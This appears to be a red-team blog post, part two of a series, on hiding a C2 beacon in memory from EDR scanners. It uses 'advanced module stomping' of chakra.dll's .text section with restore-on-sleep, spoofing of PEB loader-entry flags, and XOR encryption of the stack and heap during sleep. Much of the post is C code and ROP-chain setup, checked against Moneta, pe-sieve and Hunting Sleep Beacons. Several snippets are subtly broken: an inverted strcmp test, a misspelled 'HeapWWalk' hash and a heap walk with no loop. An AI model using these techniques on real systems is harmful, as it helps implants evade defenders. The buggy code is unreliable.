Evading detection in memory - Pt 2: Improving Module Stomping (Advanced Module Stomping) + Sleep Obfuscation with heap/stack encryption
In this chapter we will cover another approach that helps against memory detection called module stomping, we will talk about IOCs, and how to improve the technique.
As mentioned in the previous blog post Evading detection in memory - Pt 1: Sleep Obfuscation - Foliage, memory detections focus on private RX
memory regions and the thread’s call stack.
The Module Stomping technique involves overwriting the RX
(read-execute) memory region of a DLL loaded in memory with shellcode, with the goal of evading detection based on private memory analysis. This method also avoids concerns about the call stack
, as the shellcode is executed from a memory region that is supported. However, a challenge with this process is that, when using sRDI (shellcode Reflection DLL Injection) C2 beacons, the memory content will be reflected into a new region, causing an overwrite of a legitimate DLL area. This results in visible modifications, which can be easily detected, generating IOCs
(Indicators of Compromise).
The solution to this problem involves using a reflective loader in conjunction with the Implant, in my case, I’ll use a shellcode that doesn’t reflect. However, even with this approach, the overwritten memory area can still be perceptible. To enhance this technique and reduce the likelihood of detection, we propose the following process:
- Allocate Mapped RW Memory: First, we allocate two Mapped RW memory regions, called
Memory Mapped A
andMemory Mapped B
. - Backup the DLL: We back up the DLL that will be overwritten by storing it in
Memory Mapped A
, for later preserve the integrity of the original DLL. - Write the Beacon: The beacon (shellcode) is then written into
Memory Mapped B
, a secure memory area for the payload. - Stomp the text section with shellcode Implant: We will load DLL using LoadLibraryEx passing
DONT_RESOLVE_DLL_REFERENCES
and overwrite the text section of the module. - Restore During “Sleep”: During the process’s “sleep” time (inactivity), the overwritten DLL is restored to its original position in memory from the backup in
Memory Mapped A
. This step ensures that while the beacon is inactive, the memory will appear legitimate, containing the original DLL data. - Prepare for Execution: When it’s time to execute the beacon, the memory is overwritten again, and the beacon is loaded back into
Memory Mapped B
, replacing the restored DLL.
In this way, the DLL’s memory will appear legitimate during the beacon’s inactivity period, with a very brief window of visibility only during the beacon’s execution. This minimizes the chances of detection, as the memory changes occur only during the active execution phase and are quickly reverted once the beacon has finished executing.
Injection: Stomping
We will have a structure to store values to pass to our agent, containing information about the MAPPED
memory for agent backup and the backup of the Stomped Module.
1
2
3
4
typedef struct _STOMP_ARGS {
PVOID AgntBackup;
PVOID ModBackup;
} STOMP_AGRS, *PSTOMP_ARGS;
(In the injection code responsible for loading the DLL, we will start with a simple POC, loading the DLL “chakra.dll”, …) In the injection code, we will start with a simple POC by loading a DLL called chakra.dll, first, we will load it using the API LoadLibraryEx passing DONT_RESOLVE_DLL_REFERENCES
1
MmBase = Instance.Win32.LoadLibraryExA( "chakra.dll", NULL, DONT_RESOLVE_DLL_REFERENCES );
This way, the DllMain entrypoint of the DLL is not called, and it also does not resolve the IAT, as otherwise the loaded DLL could load other DLLs and start other threads, which we do not want while performing Module Stomping. The standard use of LoadLibraryEx is problematic for several reasons that we will discuss later.
We will parse the DLL header to find its .text section.
1
2
3
4
5
6
7
8
SecHdr = IMAGE_FIRST_SECTION( Header );
for ( ULONG i = 0; i < Header->FileHeader.NumberOfSections; i++ ) {
if ( strcmp( C_PTR( SecHdr[ i ].Name ), ".text" ) ) {
break;
}
}
MmBase = (UINT64)(MmBase) + SecHdr->VirtualAddress;
Now, we will create backups of the Agent and the Module using MAPPED
memory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
hFile = Instance.Win32.CreateFileMappingA(
INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE,
NULL, StompArgs.Length, NULL
);
StompArgs.Backup = Instance.Win32.MapViewOfFile(
hFile, FILE_MAP_WRITE | FILE_MAP_READ,
NULL, NULL, StompArgs.Length
);
StompArgs.Backup2 = Instance.Win32.MapViewOfFile(
hFile, FILE_MAP_WRITE | FILE_MAP_READ,
NULL, NULL, StompArgs.Length
);
After changing the protection to RW
, we will populate the agent backup and write our shellcode to the .text
section, then revert to the previous protection, and finally call ShellcodeMain, passing the structure as an argument.
1
2
3
4
5
6
7
8
9
10
11
Instance.Win32.VirtualProtect( MmBase, SecHdr->SizeOfRawData, PAGE_READWRITE, &Protect );
MmCopy( StompArgs.ModBackup, MmBase, ShellcodeSize );
MmCopy( MmBase, ShellcodeBuffer, ShellcodeSize );
MmZero( ShellcodeBuffer, ShellcodeSize ); // this depends on the shellcode location
bCheck = Instance.Win32.VirtualProtect( MmBase, SecHdr->SizeOfRawData, Protect, &Protect );
if ( !bCheck ) return;
Instance.Win32.BlackoutMain( &StompArgs );
Agent: SleepObf + Stomping
We will start the sleep obfuscation chain by changing the RX area’s address to RW
, then writing with the module’s backup, reverting to RX
, and then sleeping:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
RopProtRx.Rip = Gadget; //jmp rbx gadget
RopProtRw.Rbx = &Instance()->Win32.VirtualProtect;
RopProtRw.Rcx = Instance()->Base.RxBase;
RopProtRw.Rdx = Instance()->Base.RxBase;
RopProtRw.R8 = PAGE_READWRITE;
RopProtRw.R9 = &OldProt;
RopModBcp.Rip = Instance()->Win32.WriteProcessMemory;
RopModBcp.Rcx = NtCurrentProcess();
RopModBcp.Rdx = Instance()->Base.Buffer;
RopModBcp.R8 = Instance()->StompArgs->ModBackup;
RopModBcp.R9 = Instance()->Base.FullLen;
RopProtRx.Rip = Gadget; //jmp rbx gadget
RopProtRx.Rbx = &Instance()->Win32.VirtualProtect;
RopProtRx.Rcx = Instance()->Base.Buffer;
RopProtRx.Rdx = Instance()->Base.FullLen;
RopProtRx.R8 = PAGE_EXECUTE_READ;
RopProtRx.R9 = &OldProt;
RopDelay.Rip = Instance()->Win32.WaitForSingleObjectEx;
RopDelay.Rcx = NtCurrentProcess();
RopDelay.Rdx = SleepTime;
RopDelay.R8 = FALSE;
Now let’s observe that the call stack
appears legitimate.
Perspective from pe-sieve
Note: The interesting part is that if we don’t revert the module’s memory back to RX
and leave it as RW
, Moneta doesn’t detect it. However, this isn’t a recommended approach.
Perspective from moneta about not reverting memory to RX
warning: “unsigned module” is just because my .exe is not signed with a certificate.
Perspective from moneta about reverting memory to RX:
We encounter issues with Shareable Working Set and SharedOriginal. I was alerted to this after reading a blog post by Nigerald and your can see his blog post here, which can be found in the last section of this blog post under “Reference and credits”. He explains them as follows:
Shared Working Set
is the number of bytes of memory that this particular page is using and is shared. To avoid wasting memory, some of it is shared. For example,ntdll
is loaded into all processes and uses the same physical memory. If this shared memory is written to, the process gets a private copy of the memory page, using additional physical memory.SharedOriginal
is a flag of a memory page that indicates whether this page is the original mapping. This flag is set to 0 when the page is written to, meaning it would be a copy of the original page, but modified.
Moneta flagged this due to these flags, so I developed a POC (Proof of Concept) to circumvent this. The idea is as follows:
- First, we allocate just one Mapped RW memory region for implant backup.
- Write to memory to create a backup of the implant content.
- During Sleep Obfuscation, we unload the loaded module and load a fresh instance of the same module without the corrupted image pages.
- Upon waking, restore the implant to the
.text
section and resume execution.
In this POC, I won’t go into detail about the injector as I believe it’s clear how to adapt it. Moving directly to the implant, we will proceed with:
1
2
3
4
5
6
7
RopFreeLb.Rip = Instance()->Win32.LdrUnloadDll;
RopFreeLb.Rcx = hLibraryFr;
RopLoadLb.Rip = Instance()->Win32.LoadLibraryExA;
RopLoadLb.Rcx = LibraryFr;
RopLoadLb.Rdx = NULL;
RopLoadLb.R8 = DONT_RESOLVE_DLL_REFERENCES;
These are the first two fragments of the chain, but we still have the issue with LoadLibraryExA, which is a bit worse in this implementation. Now it’s time to fix this and explain more about its problems.
When a module is loaded with the DONT_RESOLVE_DLL_REFERENCES
flag within the LDR_DATA_TABLE_ENTRY
located inside the LDR, some of its values are abnormal, as can be seen below:
This image was taken from the blog post by BRC4 Release: Nightmare, which can be found in the “References and Credits” section. According to him, the values represent the following:
EntryPoint
: The entry point for the module’s execution, where theDllMain
address would be located.ImageDLL
: This means the DLL was loaded as an EXE rather than as a DLL.LoadNotificationsSent
: This indicates that the loading notification for the DLL was not sent.ProcessStaticImport
: This means the DLL’s imports were not processed.
I will create a simple piece of code to compare a DLL loaded with LoadLibraryA and compare it with a DLL loaded using LoadLibraryExA with the DONT_RESOLVE_DLL_REFERENCES
flag. The result is shown below:
Note: When I examined other modules, and even the DLL loaded “normally,” the ProcessStaticImport
member was marked as false
, so I kept it as false
in this case.
To fix this in the PEB, we have the following example code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PLDR_DATA_TABLE_ENTRY Data = { 0 };
PLIST_ENTRY Head = &Instance()->Teb->ProcessEnvironmentBlock->Ldr->InLoadOrderModuleList;
PLIST_ENTRY Entry = Head->Flink;
PIMAGE_NT_HEADERS NtHdrs = { 0 };
UINT64 Ep = 0;
HMODULE Module = NULL;
for ( ; Head != Entry ; Entry = Entry->Flink ) {
Data = C_PTR( Entry );
if ( strcmp( Data->BaseDllName.Buffer, ModuleName ) == 0 ) {
Module = Data->DllBase;
break;
}
}
NtHdrs = ( (PBYTE)( Module ) + ( (PIMAGE_DOS_HEADER)( Module ) )->e_lfanew );
Ep = Module + NtHdrs->OptionalHeader.AddressOfEntryPoint;
Data->EntryPoint = Ep;
Data->Flags = 0x8a2cc;
Data->ImageDll = 1;
Data->LoadNotificationsSent = 1;
Data->ProcessStaticImport = 0;
We retrieve the module’s address, then parse it to obtain the AddressOfEntryPoint
and pass it to PLDR_DATA_TABLE_ENTRY->EntryPoint
. The other values will be set according to the screenshot above.
This time we will even add Hunting Sleep Beacons, below we have our advanced module stomping vs memory scanners.
Moneta:
pe-sieve:
Hunting Sleep Beacons:
Heap/Stack Encryption - Plus
An important step in sleep obfuscation is to encrypt both the stack
and the heap
. Many pieces of information such as variables, function return addresses, etc., are stored in these areas at runtime.
Stack
To obfuscate the stack, we need its base address and size. For this, we can use the TEB->NT_TIB.StackBase
and TEB->NT_TIB.StackLimit
values. Once we have the base address and size, we can pass them to an encryption/obfuscation function.
1
2
3
4
5
PTEB Teb = NtCurrentTeb();
PVOID StackBase = Teb->NtTib.StackBase;
PVOID StackLimit = Teb->NtTib.StackLimit;
XorStack( StackBase, StackSize );
using this function to obf:
1
2
3
4
5
6
7
8
FUNC VOID XorStack(
PVOID StackBase,
PVOID StackLimit
) {
for ( PUCHAR Ptr = StackLimit; Ptr < StackBase; Ptr++ ) {
*Ptr ^= 0xFF;
}
}
Stack xor demo
You may want to use run sleepobf in another thread so that it can xor the stack of the main beacon thread, just be careful not to mess up the call stack
Heap
When dealing with the heap, we need to be cautious. If we use the return value from GetProcessHeap or PEB->ProcessHeap
, we will be using the main
heap of the process. It’s certain that other threads may also be using the same heap, and if we obfuscate it, the threads will likely freeze, causing the process to crash. Another approach would be to enumerate all threads and suspend them, but I don’t like this idea, and I’m sure you understand why.
To solve this problem, we will create our own heap using RtlCreateHeap.
1
PVOID Heap = RtlCreateHeap( NULL, NULL, 0, 0, 0, NULL );
This way, we will have our own heap, and when we use functions like HeapAlloc and others, we will pass our custom heap.
Now, we need to enumerate the blocks and get their size. We can use HeapWalk, which returns a structure of PROCESS_HEAP_ENTRY. The important members are lpData
, which is the base address of the block, and cbData
, which is the size of the heap block.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
FUNC VOID HeapObf(
PVOID Heap
) {
BLACKOUT_INSTANCE
PROCESS_HEAP_ENTRY HeapEntry = { 0 };
BYTE HeapKey[16] = { 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55 }; // can be random generation
MmZero( &HeapEntry, sizeof( PROCESS_HEAP_ENTRY ) );
typedef WINBOOL (*fHeapWalk)(HANDLE hHeap, LPPROCESS_HEAP_ENTRY lpEntry);
fHeapWalk pHeapWalk = LdrFuncAddr( LdrModuleAddr( H_MODULE_KERNEL32 ), HASH_STR( "HeapWWalk" ) );
pHeapWalk( Heap, &HeapEntry );
if ( HeapEntry.wFlags & PROCESS_HEAP_ENTRY_BUSY ) {
XorCipher( HeapEntry.lpData, HeapEntry.cbData, HeapKey, sizeof(HeapKey) );
}
}
Heap obuscated demo
Another approach that may be better than creating your own heap would be to create a wrapper function that allocates on the heap and put all allocations in a linked list PLIST_ENTRY
and still use the process’s own Heap, an idea originally from @bakki
Observation
There are some improvements that could be made here, such as compile-time string encryption, obfuscating backup regions, using indirect syscalls
, etc., but we’re focusing solely on memory evasion for now. We still need to bypass the Elastic rule I mentioned in the previous blog post Evading detection in memory - Pt 1: Sleep Obfuscation - Foliage.
I’m developing a custom agent for the Havoc C2 Framework, which will feature some of these even more sophisticated techniques and will be open source. I’ll share more about this project soon.